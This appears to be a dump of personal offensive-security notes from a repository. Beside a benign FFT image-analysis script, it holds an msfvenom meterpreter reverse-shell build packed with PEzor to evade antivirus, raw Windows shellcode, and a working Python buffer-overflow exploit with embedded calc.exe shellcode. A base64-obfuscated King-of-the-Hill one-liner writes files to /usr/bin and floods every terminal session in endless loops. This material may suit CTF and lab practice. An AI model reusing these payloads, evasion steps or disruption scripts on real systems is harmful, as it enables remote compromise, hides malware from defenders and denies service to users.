'tab20b_r', 'tab20c', 'tab20c_r', 'terrain', 'terrain_r', 'turbo', 'turbo_r', 'twilight', 'twilight_r', 'twilight_shifted', 'twilight_shifted_r', 'viridis', 'viridis_r', 'winter', 'winter_r']

def two_d_FFT(cmapMode):
    # Load the image in grayscale mode
    img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    if img is None:
        sys.exit("could not read image: %s" % path)
    # Compute the two-dimensional FFT.
    f = np.fft.fft2(img)
    # Swap half-spaces for all axes so the zero frequency sits in the centre
    fshift = np.fft.fftshift(f)
    # Log-scaled magnitude spectrum (+1 avoids log(0) on empty bins). Content hidden
    # in the frequency domain shows up as visible shapes/text in this plot.
    magnitude_spectrum = 20 * np.log(np.abs(fshift) + 1)
    plt.title(cmapMode)
    plt.imshow(magnitude_spectrum, cmap=cmapMode)

# Four colour maps side by side; pick any from cmaptypes_available if nothing stands out
plt.figure()
plt.subplot(221)
two_d_FFT('Accent')
plt.subplot(222)
two_d_FFT('rainbow')
plt.subplot(223)
two_d_FFT('binary')
plt.subplot(224)
two_d_FFT('Reds')

# Display the result
plt.show()
--------------------------------------------------------------------------------
/docs/shellcode.md:
--------------------------------------------------------------------------------
# Shellcode Notes

## [⬅ Back to Index](../README.md)

The following are my helpful short opcodes to open Command Prompt for testing against vulnerable apps.
6 | 7 | ### Reference 8 | 9 | * [1] 10 | 11 | ### Links 12 | 13 | * [Helpful Opcode Chemistry table](http://sparksandflames.com/files/x86InstructionChart.html) 14 | 15 | --- 16 | 17 | ## FUD packer by phra - PEzor 18 | 19 | ### Build venom payload to connect back to our shell 20 | 21 | * `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.150.114 LPORT=8081 -o /opt/lol64 --format raw` 22 | 23 | ### Run phra's packer 24 | 25 | * PEzor located here: 26 | * `bash PEzor/PEzor.sh -64 -sgn -text -syscalls -sleep=42 lol64` 27 | 28 | ### 1/70 detections on Virustotal 29 | 30 | Run the exe on our Win 10 target by any means. 31 | 32 | Boom, full meterpreter via multihandler! 33 | 34 | --- 35 | 36 | ## Raw shellcode 37 | 38 | ### Win32 - WinExec(A,B) w/ SW_HIDE 39 | 40 | ```asm 41 | 33c0 ; Clear out eAX 42 | 50 ; Use "0" for (B) of winexec if we just want the smallest shellcode 43 | ; "0" from eAX will be equivalent to SW_HIDE constant [1]. 44 | 68636d6400 ; Push "cmd" (A) 45 | 8bcc ; Mov ecx,esp 46 | 53 ; Push eBX (B) 47 | 51 ; Push eCX (A) 48 | b86ef47875 ; My location of winexec(A,B) in kernel32 DLL, ASLR will change this on every boot. 49 | ffd0 ; Call eAX (fire!) 
50 | 51 | Full: 52 | \x33\xc0\x50\x68\x63\x6d\x64\x00\x8b\xcc\x53\x51\xb8\x6e 53 | \xf4\x78\x75\xff\xd0 54 | 55 | Null-free: 56 | \x33\xdb\xbb\x52\x5c\x53\xef\x81\xc3\x11\x11\x11\x11\x53 57 | \x8b\xdc\x33\xc0\x50\x53\xb8\x6e\xf4\x78\x75\xff\xd0 58 | 59 | SGN Encoded (single round): 60 | \xba\x20\x8e\xae\xc7\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b\xc9 61 | \xb1\x05\x31\x56\x15\x83\xc6\x04\x03\x56\x11\xe2\xd5\xbd 62 | \x6e\x97\x7d\xa1\x03\x7c\x7d\xae\x10\x2f\x2c\x08\xc6\x24 63 | \xb6\x1d\xe8\x15 64 | ``` 65 | 66 | ### Win32 - ShellExecuteA w/ SW_SHOW 67 | 68 | #### Issue: may require vulnerable app to have shell32 DLL loaded, check with procexp 69 | 70 | ```asm 71 | 68636d6400 ; push "cmd" 72 | 8bdc ; Mov ebx, esp 73 | 6a00 ; Push nullbyte to end "open" string 74 | 686f70656e ; Push "open" 75 | 8bcc ; Mov ecx, esp 76 | 6a05 ; Push "5" for SW_SHOW constant [1]. 77 | 33c0 ; Xor eax with itself (0 it out) 78 | 50 ; Push eax (null, or "0") 79 | 50 ; Push eax 80 | 53 ; Push ebx 81 | 51 ; Push ecx 82 | 50 ; Push eax 83 | b8c0877a76 ; My location of ShellExecuteA(x,x,x,x,x,x) in shell32 DLL, ASLR will change this on every boot. 84 | ffd0 ; Call eax 85 | 86 | Full: 87 | \x68\x63\x6d\x64\x00\x8b\xdc\x6a\x00\x68\x6f\x70\x65\x6e\x8b\xcc\x6a\x05\x33\xc0\x50\x50\x53\x51\x50\xb8\xc0\x87\x7a\x76\xff\xd0 88 | ``` 89 | -------------------------------------------------------------------------------- /docs/exploit-win-py3-bof.md: -------------------------------------------------------------------------------- 1 | # Python 3 Argument based buffer overflow solution 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | The problem with Python3 is that all shell interaction (e.g. using subprocess or OS) will attempt implicit decode of bytes to latin or utf8. 6 | 7 | This breaks our shellcode that relies on being specific bytes. 8 | 9 | The solution I've settled on is supported from windows 7 and above and uses a hacky powershell workaround to send raw un-encoded bytes to the argument of a program. 
It does this by writing a binary file and using PowerShell to cat it out into the argument of the program.

I know, I know, terrible.

---

## Code

```python3
import os
import sys
from struct import pack
import subprocess
# Usage:
#
# >>> Findjmp ntdll.dll esp
# Scanning ntdll.dll for code useable with the esp register
# 0x776D57CE call esp
# 0x77711C43
# [.....]
# Finished Scanning ntdll.dll for code useable with the esp register
# Found 8 usable addresses...
#
# Put one of them into "function_location"
#
# >>> py -3 py3-terrible.py
# Sends this to program argument 1 as an example (calc.exe shellcode)
# 000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 000010 41 41 41 41 41 41 3b 7d 26 90 90 90 90 90 90 90
# 000020 90 31 db 64 8b 7b 30 8b 7f 0c 8b 7f 1c 8b 47 08
# 000030 8b 77 20 8b 3f 80 7e 0c 33 75 f2 89 c7 03 78 3c
# 000040 8b 57 78 01 c2 8b 7a 20 01 c7 89 dd 8b 34 af 01
# 000050 c6 45 81 3e 43 72 65 61 75 f2 81 7e 08 6f 63 65
# 000060 73 75 e9 8b 7a 24 01 c7 66 8b 2c 6f 8b 7a 1c 01
# 000070 c7 8b 7c af fc 01 c7 89 d9 b1 ff 53 e2 fd 68 63
# 000080 61 6c 63 89 e2 52 52 53 53 53 53 53 53 52 53 ff
# 000090 d7


# ------- OPTIONS --------
binary_name = b"sploitme.exe"
padding_to_BOF = 22  # Junk -> EBP Overwritten
# Enter the memory location you want to exec
function_location = 0x773407A8  # use a kernel32 JMP ESP when using shellcode
no_null_bytes = False  # C library functions such as strcpy
                       # will stop on \x00 and kill the exploit,
                       # toggle to avoid this!
nop_count = 0
shellcode = b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"

# Open calc.exe generic all-win32: "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
# -----------------------

def fast_byte_build(byte_to_use, count):
    """Repeat a single byte `count` times (junk padding or NOP sled)."""
    ret = bytearray()
    for _ in range(count):
        ret += byte_to_use
    return bytes(ret)

payload = fast_byte_build(b'\x41', padding_to_BOF)
# Little-endian 32-bit address lands on the saved return pointer
payload += pack("<I", function_location)
if nop_count > 0:
    nop_sled = fast_byte_build(b'\x90', nop_count)
    payload += nop_sled
payload += shellcode
# Python3 remedy for its implicit decoding of byte sequences in a shell:
# write the raw bytes in binary mode, never through a str
with open("buffersploit.txt", "wb+") as f:
    f.write(payload)

# Fire the hack... literally and figuratively
print("Executing: " + binary_name.decode('utf8'))
print("Payload: " + str(payload))

command = [
    "powershell.exe",
    "-c",
    "./" + binary_name.decode('utf8'),
    "$(cat buffersploit.txt)"
]
subprocess.call(command, shell=True)
```

--------------------------------------------------------------------------------
/docs/king-of-the-hill.md:
--------------------------------------------------------------------------------

# King of the hill

## [⬅ Back to Index](../README.md)

---

## Hostile environment!1!

### Infinite spam cowsay to all possible 10 sessions

Better than /dev/urandom!

This one-liner will unpack the cowsay script and use it to spam all tty sessions till the ... cows.. come home.

*Perfect for keeping king, not so much for keeping friends!*

* Uses perl script "Cowsay 3.03" located here:

```bash
echo JHRoZV9jb3cgPSA8PCJFT0MiOwogICAgICAgICR0aG91Z2h0cyAgIF5fX14KICAgICAgICAgJHRob3VnaHRzICAoJGV5ZXMpXFxfX19fX19fCiAgICAgICAgICAgIChfXylcXCAgICAgICApXFwvXFwKICAgICAgICAgICAgICR0b25ndWUgfHwtLS0tdyB8CiAgICAgICAgICAgICAgICB8fCAgICAgfHwKRU9DCg==|base64 -d>/usr/bin/default.cow;echo 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|base64 -d>/usr/bin/cowsay.pl;for i in $(seq 0 10);do while [ 1 ];do perl /usr/bin/cowsay.pl -f /usr/bin/default.cow deeznuts > /dev/pts/$i &done &done
```

--------------------------------------------------------------------------------